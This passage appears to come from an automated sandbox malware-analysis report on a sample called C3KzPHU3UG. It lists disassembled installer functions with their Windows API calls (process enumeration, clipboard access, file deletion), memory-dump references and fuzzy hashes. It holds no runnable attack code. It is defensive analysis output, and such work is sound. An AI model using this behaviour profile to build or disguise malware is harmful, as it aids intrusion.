                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: PathSearch
                                              • String ID:
                                              • API String ID: 2203818243-0
                                              • Opcode ID: 223388b599ff242e7ccadcd08180d40b3faf74b659585ba66a24a54107b5256e
                                              • Instruction ID: 00f5228fbcba69d7f7f389f47c449123412ef94834c0b690fd6e23632fde5db3
                                              • Opcode Fuzzy Hash: 223388b599ff242e7ccadcd08180d40b3faf74b659585ba66a24a54107b5256e
                                              • Instruction Fuzzy Hash: ABE04F32304255AAF340DBA4DD49B9E73A4DB40728F20423AEA15F60D1E3B49A84C769
                                              Function 00402E9E Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F3A,000000FF,00000004,00000000,00000000,00000000), ref: 00402EB5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 6eb761298bb8b99514d02d989ea50b9b43b036f115663e871731ccf59cb5bf7b
                                              • Instruction ID: bd695a607233752ff1959b473a7ca1503adc94cd5dff5db9087338bb7c64902f
                                              • Opcode Fuzzy Hash: 6eb761298bb8b99514d02d989ea50b9b43b036f115663e871731ccf59cb5bf7b
                                              • Instruction Fuzzy Hash: F0E08C322A0218BBCB219E91DE08AE73B5CEB047A2F008436B958E51D0D674D952DBF9
                                              Function 00403360 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00405AE7: CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
                                                • Part of subcall function 00405AE7: CharNextW.USER32(?,?,?,00000000), ref: 00405B59
                                                • Part of subcall function 00405AE7: CharNextW.USER32(?,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
                                                • Part of subcall function 00405AE7: CharPrevW.USER32(?,?,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72
                                              • CreateDirectoryW.KERNELBASE(004E00C8,00000000,004E00C8,004E00C8,004E00C8,00000002,0040359B), ref: 00403381
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Char$Next$CreateDirectoryPrev
                                              • String ID:
                                              • API String ID: 4115351271-0
                                              • Opcode ID: c9f98378969a177fcb370052af8fd256873b8aecdbe0e59b9a239e0623e805da
                                              • Instruction ID: d79b23296e172e3f7541ee3cb439833c7f4a864136be478e135bd67e808ea9fb
                                              • Opcode Fuzzy Hash: c9f98378969a177fcb370052af8fd256873b8aecdbe0e59b9a239e0623e805da
                                              • Instruction Fuzzy Hash: 54D09E11547D7561C56236663E46FDF151C8F52359F114077F540B51C25A6C0A8289ED
                                              Function 00402ED0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032EE,?,?,?,?,00000000,004035D7,?), ref: 00402EDE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 052875b64ac29a69a56fe5fa30ce1250d27c90eff136e832dd86e8876edcd7ee
                                              • Instruction ID: 4946e7aaa73dbe9c50503acfc76fe66090dc5a246f76b590ec387925aa062f70
                                              • Opcode Fuzzy Hash: 052875b64ac29a69a56fe5fa30ce1250d27c90eff136e832dd86e8876edcd7ee
                                              • Instruction Fuzzy Hash: 4EB09231140300AADA215F009E09F057B21AB90700F108824B291281F086712020EA0D
                                              Function 00401646 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(00000000), ref: 00401656
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 8dc5173ed66c8cb9375c8a62a6b21d0958b4d16d400b23e9b38b04bf0691659c
                                              • Instruction ID: b7a5ace7ee108f6bfae9467569b9736203130378aa17b3a4f183cff96938e45a
                                              • Opcode Fuzzy Hash: 8dc5173ed66c8cb9375c8a62a6b21d0958b4d16d400b23e9b38b04bf0691659c
                                              • Instruction Fuzzy Hash: 42D02233704200CBE700F7B8AE8942E33A4E71232D3200C3BD803F20A0D639C8C1822D

                                              Non-executed Functions

                                              Function 00405C70 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 00405C83
                                              • lstrlenW.KERNEL32(?), ref: 00405C90
                                              • GetVersionExW.KERNEL32(?), ref: 00405CEE
                                                • Part of subcall function 00405ADA: CharUpperW.USER32(?,00405CC5,?), ref: 00405AE0
                                              • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00405D2D
                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00405D4C
                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00405D56
                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00405D61
                                              • FreeLibrary.KERNEL32(00000000), ref: 00405D98
                                              • GlobalFree.KERNEL32(?), ref: 00405DA1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                              • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                              • API String ID: 20674999-2124804629
                                              • Opcode ID: bfd5aff29ee4f1ffb6214c97bb0594a6be1cab25f0f6d26799202fd0c5d98f81
                                              • Instruction ID: 5cd628679c3206996b44c0f0d1c9f7c2e320434dbef64c8d82388663d9783bcf
                                              • Opcode Fuzzy Hash: bfd5aff29ee4f1ffb6214c97bb0594a6be1cab25f0f6d26799202fd0c5d98f81
                                              • Instruction Fuzzy Hash: A091407190061AEBDF109FA4CD88AAFBBB8EF44741F10407AE545F6190DB788A45CF69
                                              Function 0040447D Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,000003F9), ref: 00404494
                                              • GetDlgItem.USER32(?,00000408), ref: 004044A1
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 004044F0
                                              • LoadBitmapW.USER32(0000006E), ref: 00404503
                                              • SetWindowLongW.USER32(?,000000FC,Function_000043CD), ref: 0040451D
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040452F
                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404543
                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404559
                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404565
                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404575
                                              • DeleteObject.GDI32(?), ref: 0040457A
                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004045A5
                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004045B1
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404652
                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404675
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404686
                                              • GetWindowLongW.USER32(?,000000F0), ref: 004046B0
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004046BF
                                              • ShowWindow.USER32(?,00000005), ref: 004046D0
                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 004047CE
                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404829
                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040483E
                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404862
                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404888
                                              • ImageList_Destroy.COMCTL32(?), ref: 0040489D
                                              • GlobalFree.KERNEL32(?), ref: 004048AD
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040491D
                                              • SendMessageW.USER32(?,00001102,?,?), ref: 004049CB
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004049DA
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004049FA
                                              • ShowWindow.USER32(?,00000000), ref: 00404A4A
                                              • GetDlgItem.USER32(?,000003FE), ref: 00404A55
                                              • ShowWindow.USER32(00000000), ref: 00404A5C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $ @$M$N
                                              • API String ID: 1638840714-3479655940
                                              • Opcode ID: 937356102a75185e20c66d4cdea0a1291c72136f879f0bdf363495dfedd26f78
                                              • Instruction ID: b4b482d55b4410d1430187b36ccef83e55c8bda0955db637de4799104be70721
                                              • Opcode Fuzzy Hash: 937356102a75185e20c66d4cdea0a1291c72136f879f0bdf363495dfedd26f78
                                              • Instruction Fuzzy Hash: 5F027BB0900209EFDB119FA4CD45AAEBBB5FB84315F10813AF614B62E0D7799E91CF58
                                              Function 00404BB4 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 290windowclipboardmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,00000403), ref: 00404C16
                                              • GetDlgItem.USER32(?,000003EE), ref: 00404C25
                                              • GetClientRect.USER32(?,?), ref: 00404C62
                                              • GetSystemMetrics.USER32(00000015), ref: 00404C6A
                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00404C8B
                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00404C9C
                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00404CAF
                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00404CBD
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00404CD0
                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404CF2
                                              • ShowWindow.USER32(?,00000008), ref: 00404D06
                                              • GetDlgItem.USER32(?,000003EC), ref: 00404D27
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404D37
                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404D4C
                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00404D58
                                              • GetDlgItem.USER32(?,000003F8), ref: 00404C34
                                                • Part of subcall function 00403920: SendMessageW.USER32(00000028,?,00000001,00405280), ref: 0040392E
                                              • GetDlgItem.USER32(?,000003EC), ref: 00404D77
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00004B48,00000000), ref: 00404D85
                                              • CloseHandle.KERNEL32(00000000), ref: 00404D8C
                                              • ShowWindow.USER32(00000000), ref: 00404DB3
                                              • ShowWindow.USER32(?,00000008), ref: 00404DB8
                                              • ShowWindow.USER32(00000008), ref: 00404DFF
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404E31
                                              • CreatePopupMenu.USER32 ref: 00404E42
                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00404E57
                                              • GetWindowRect.USER32(?,?), ref: 00404E6A
                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00404E8C
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404EC7
                                              • OpenClipboard.USER32(00000000), ref: 00404ED7
                                              • EmptyClipboard.USER32 ref: 00404EDD
                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00404EE9
                                              • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00404EF3
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404F07
                                              • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00404F29
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00404F34
                                              • CloseClipboard.USER32 ref: 00404F3A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                              • String ID: {
                                              • API String ID: 590372296-366298937
                                              • Opcode ID: 17b19512de00e59187fca8f5a6567c7c37cbdab995639fd4f0823fef6f6269fe
                                              • Instruction ID: 4a1b14a679f192c254d8bf3bd6cec492735fc4b3fb0f93a90a805189e19306d7
                                              • Opcode Fuzzy Hash: 17b19512de00e59187fca8f5a6567c7c37cbdab995639fd4f0823fef6f6269fe
                                              • Instruction Fuzzy Hash: FBB15CB0900208BFDB11AF60DD89EAE7B79FF44355F00817AFA45B61A1CB748A91DF58
                                              Function 0040400B Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 272stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,000003FB), ref: 0040405A
                                              • SetWindowTextW.USER32(?,?), ref: 00404087
                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040413F
                                              • CoTaskMemFree.OLE32(00000000), ref: 0040414A
                                              • lstrcmpiW.KERNEL32(%AtlasTreasures%,0044FD98,00000000,?,?), ref: 0040417C
                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404198
                                              • lstrcatW.KERNEL32(?,%AtlasTreasures%), ref: 00404188
                                                • Part of subcall function 00405731: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403AE8), ref: 00405744
                                                • Part of subcall function 00405AE7: CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
                                                • Part of subcall function 00405AE7: CharNextW.USER32(?,?,?,00000000), ref: 00405B59
                                                • Part of subcall function 00405AE7: CharNextW.USER32(?,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
                                                • Part of subcall function 00405AE7: CharPrevW.USER32(?,?,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72
                                              • GetDiskFreeSpaceW.KERNEL32(00443D80,?,?,0000040F,?,00443D80,00443D80,?,00000000,00443D80,?,?,000003FB,?), ref: 0040425A
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404275
                                              • SetDlgItemTextW.USER32(00000000,00000400,0040856C), ref: 004042EE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                              • String ID: %AtlasTreasures%$A
                                              • API String ID: 2246997448-3344573410
                                              • Opcode ID: 6589979ff9a501fc495b169141efcf5f2177152b764b6bcc2381f6d8f6a68418
                                              • Instruction ID: 82e0f664371878e3f8136284ca2467dd10f3df84af4d3fe89a4ee6e4629e8810
                                              • Opcode Fuzzy Hash: 6589979ff9a501fc495b169141efcf5f2177152b764b6bcc2381f6d8f6a68418
                                              • Instruction Fuzzy Hash: 91A181B1A00208ABDB11AFA1C885AAF7BB8EF44314F10407FFA05B72D1D77C9A419F59
                                              Function 00406559 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 162filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteFileW.KERNEL32(?,?,004E00C8), ref: 00406578
                                              • lstrcatW.KERNEL32(00465470,\*.*), ref: 004065C8
                                              • lstrcatW.KERNEL32(?,004082C8), ref: 004065E8
                                              • lstrlenW.KERNEL32(?), ref: 004065EB
                                              • FindFirstFileW.KERNEL32(00465470,?), ref: 004065FF
                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?), ref: 004066B5
                                              • FindClose.KERNEL32(00000000), ref: 004066C6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: \*.*$pTF
                                              • API String ID: 2035342205-2155356189
                                              • Opcode ID: 4d656ded0a8bf8375e6a0408538251f1fecec283f47e8baec3b74e355d12da64
                                              • Instruction ID: cb8e43480c0494b88bcdaab5263094abc6d8a088fa6e5b396f43e0b3f7cdc2f6
                                              • Opcode Fuzzy Hash: 4d656ded0a8bf8375e6a0408538251f1fecec283f47e8baec3b74e355d12da64
                                              • Instruction Fuzzy Hash: ED51B170800618AACF20AB35CD45A6B7768EF40358F12893BB857761D2DB3D8DA1CB5D
                                              Function 00402218 Relevance: 1.6, APIs: 1, Instructions: 120comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoCreateInstance.OLE32(00408AEC,00000000,00000001,00408ACC,?,00000000), ref: 00402272
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CreateInstance
                                              • String ID:
                                              • API String ID: 542301482-0
                                              • Opcode ID: b89fa3b0e8c371e7ca3b560dfc137a163ff1d9034affe8bcb8ea131d3c401b1a
                                              • Instruction ID: b8756f995b5f19bf65138570f0328ac05a5921d347238761232d12e19ef7feba
                                              • Opcode Fuzzy Hash: b89fa3b0e8c371e7ca3b560dfc137a163ff1d9034affe8bcb8ea131d3c401b1a
                                              • Instruction Fuzzy Hash: 2C414679A00204AFCB04EFA4C988E9E7B79EF48314F20456AF915EB3E1CB79D941CB54
                                              Function 004029F1 Relevance: 1.5, APIs: 1, Instructions: 28fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00402A01
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              • API String ID: 1974802433-0
                                              • Opcode ID: 2942623f6c0277285390027b9d18840a489366ce0a7cc68cdc812ca0f05454fe
